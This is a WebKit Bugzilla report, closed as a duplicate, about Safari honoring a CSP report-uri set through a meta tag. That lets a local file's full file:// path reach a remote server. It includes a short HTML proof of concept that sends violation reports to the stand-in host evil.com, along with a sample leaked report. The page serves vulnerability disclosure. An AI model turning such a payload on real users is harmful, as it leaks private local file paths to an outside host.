WebKit Bugzilla
New
Browse
Log In
×
Sign in with GitHub
or
Remember my login
Create Account
·
Forgot Password
Forgotten password account recovery
RESOLVED DUPLICATE of
bug 154307
Bug 158263
CSP: report-uri is honored even if CSP is served via <meta> tag, leaking full file:// paths as document-uri
https://bugs.webkit.org/show_bug.cgi?id=158263
Summary
CSP: report-uri is honored even if CSP is served via <meta> tag, leaking full...
Michele Spagnuolo
Reported
2016-06-01 09:03:39 PDT
Safari leaks the full file:// path in document-uri if a report-uri is in a CSP served via <meta> tag, even if the specification explicitly prohibits to honor report-uri if the policy is served via <meta> tag[1]. PoC: report-uri.html ---------------- <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Security-Policy" content="img-src 'none'; report-uri
https://evil.com/csp
"> <title>CSP report-uri demo</title> </head> <body> <img src="cat.jpg" alt="A nice cat"> </body> </html> This is the report sent to a remote report-uri: {"csp-report":{"document-uri":"file:///Users/mikispag/CSP/report-uri.html","referrer":"","violated-directive":"img-src 'none'","original-policy":"img-src 'none'; report-uri
https://evil.com/csp
","blocked-uri":"file"}} [1]
https://www.w3.org/TR/CSP2/#directive-report-uri
Attachments
Add attachment
proposed patch, testcase, etc.
Daniel Bates
Comment 1
2016-06-01 20:18:44 PDT
*** This bug has been marked as a duplicate of
bug 154307
***
Daniel Bates
Comment 2
2016-06-01 20:24:24 PDT
Out of curiosity, what version of Safari are you using? You can find the version of Safari in Safari > About Safari.
Note
You need to
log in
before you can comment on or make changes to this bug.
Top of Page
Format For Printing
XML
Clone This Bug